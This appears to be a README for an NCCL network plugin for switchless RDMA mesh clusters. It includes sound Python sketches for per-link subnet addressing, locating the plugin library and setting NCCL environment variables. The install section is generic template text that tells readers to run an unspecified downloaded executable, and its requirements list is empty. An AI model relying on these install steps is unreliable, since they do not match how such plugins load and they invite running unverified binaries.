The NCCL Mesh Plugin enables efficient NCCL communication across direct-connect RDMA mesh topologies. Unlike standard NCCL plugins, it works when nodes are located in different subnets. It supports several topologies (full mesh, ring, and line), so you can set up a distributed machine learning environment without complex networking solutions.
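A direct-connect mesh has no switch, so a common way to address it is to give every cable its own small point-to-point subnet. Each node then has one address per link, in a different subnet for each peer, which is the situation described above. The following Python sketch illustrates that addressing and how a node could pick the local address to use for a given peer. The address pool, the /30 link size, and the node names are hypothetical example values, not taken from the plugin.

```python
import ipaddress
from itertools import combinations

def plan_links(nodes, pool="10.100.0.0/24", prefix=30):
    """Give every pair of nodes its own point-to-point subnet (full mesh).

    Returns {(a, b): (subnet, address_of_a, address_of_b)}.
    The pool and prefix length are hypothetical example values.
    """
    subnets = ipaddress.ip_network(pool).subnets(new_prefix=prefix)
    plan = {}
    for a, b in combinations(nodes, 2):
        net = next(subnets)                     # next unused /30 from the pool
        addr_a, addr_b = list(net.hosts())[:2]  # the two usable hosts of a /30
        plan[(a, b)] = (net, addr_a, addr_b)
    return plan

def addresses_for(plan, me, peer):
    """Return (my_address, peer_address) on the direct link between me and peer."""
    for (a, b), (_net, addr_a, addr_b) in plan.items():
        if (a, b) == (me, peer):
            return addr_a, addr_b
        if (b, a) == (me, peer):
            return addr_b, addr_a
    raise KeyError(f"no direct link between {me} and {peer}")

plan = plan_links(["spark1", "spark2", "spark3"])
for (a, b), (net, addr_a, addr_b) in plan.items():
    print(f"{a} <-> {b}: {net} ({a}={addr_a}, {b}={addr_b})")
# spark1 reaches spark2 from 10.100.0.1 but spark3 from 10.100.0.5 (another subnet).
print(addresses_for(plan, "spark1", "spark3"))
```

Because each node's addresses live in different subnets, a peer is only reachable through the one local interface that shares its link, so the sender has to choose the interface per peer rather than use a single default route.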
This plugin has been tested on three DGX Spark workstations connected by 100 Gbps direct RDMA links, where it was used for distributed LLM training of the Qwen2.5-14B model with DeepSpeed ZeRO.
Follow these steps to download and run the NCCL Mesh Plugin:
Visit the Download Page
Click the link below to go to the Releases page of this repository.
Download NCCL Mesh Plugin
Select the Latest Release
Look for the release labeled "Latest Release," which usually appears at the top of the page.
Download the Plugin
Find the plugin file for your platform and download it. NCCL, and therefore this plugin, runs on Linux, so pick the Linux file.
Install the Plugin
Run the file you downloaded, for example ./installation-file (replace installation-file with the actual name of the downloaded file).
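After installing, it can help to confirm that the plugin's shared library is where NCCL's loader will look. NCCL loads network plugins as shared libraries named libnccl-net.so or, when NCCL_NET_PLUGIN is set, libnccl-net-<name>.so, so a directory on LD_LIBRARY_PATH is a typical location. The following Python sketch checks only the LD_LIBRARY_PATH directories (not the system linker cache). The plugin name "mesh" is a hypothetical placeholder; the real file name depends on the release you downloaded.

```python
import os
from pathlib import Path

def find_net_plugin(name, search_path=None):
    """Return paths of libnccl-net-<name>.so found in LD_LIBRARY_PATH-style directories.

    `name` is the plugin suffix; "mesh" below is a hypothetical example.
    Only the listed directories are checked, not the system linker cache.
    """
    if search_path is None:
        search_path = os.environ.get("LD_LIBRARY_PATH", "")
    filename = f"libnccl-net-{name}.so"
    hits = []
    # Skip empty entries produced by leading, trailing, or doubled separators.
    for directory in filter(None, search_path.split(os.pathsep)):
        candidate = Path(directory) / filename
        if candidate.is_file():
            hits.append(candidate)
    return hits

if __name__ == "__main__":
    found = find_net_plugin("mesh")
    print(found or "plugin library not found on LD_LIBRARY_PATH")
```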
The NCCL Mesh Plugin requires certain hardware and software specifications for optimal use:
After installation, you may need to configure the plugin. Follow these steps:
Open the Configuration File
Navigate to the plugin directory and open the configuration file named config.toml.
Edit Topology Settings
Set the topology to match how your nodes are cabled: "full mesh", "ring", or "line".
Save Changes
Make sure to save your changes before exiting the file.
Run the Plugin
Start your distributed ML training job as you normally would, making sure NCCL loads the NCCL Mesh Plugin on every node.
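One way to make NCCL pick up a network plugin is through standard NCCL environment variables: NCCL_NET_PLUGIN selects the plugin library, and NCCL_DEBUG=INFO makes NCCL log which network backend it loaded. The Python sketch below builds such an environment. The plugin name, the library directory, and the DeepSpeed command line are hypothetical placeholders.

```python
import os
import shlex

def plugin_env(plugin_name, plugin_dir, base_env=None):
    """Return a copy of the environment configured to load an NCCL net plugin.

    NCCL_NET_PLUGIN and NCCL_DEBUG are standard NCCL variables; the values
    passed in below are hypothetical placeholders.
    """
    env = dict(os.environ if base_env is None else base_env)
    env["NCCL_NET_PLUGIN"] = plugin_name   # e.g. selects libnccl-net-<name>.so
    env["NCCL_DEBUG"] = "INFO"             # log which network plugin NCCL loaded
    # Put the plugin's directory first so the dynamic loader finds it.
    old = env.get("LD_LIBRARY_PATH", "")
    env["LD_LIBRARY_PATH"] = plugin_dir + (os.pathsep + old if old else "")
    return env

env = plugin_env("mesh", "/opt/nccl-mesh-plugin/lib", base_env={})
cmd = ["deepspeed", "--hostfile", "hostfile", "train.py"]  # hypothetical launch command
prefix = " ".join(f"{k}={shlex.quote(v)}" for k, v in sorted(env.items()))
print(prefix, shlex.join(cmd))
```

In a multi-node job these variables need to be set on every node, not only on the one that runs the launcher.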
If you run into problems or have questions about installation or configuration, open an issue on the GitHub repository and the team will help.
For further details and updates, always refer back to our Releases page.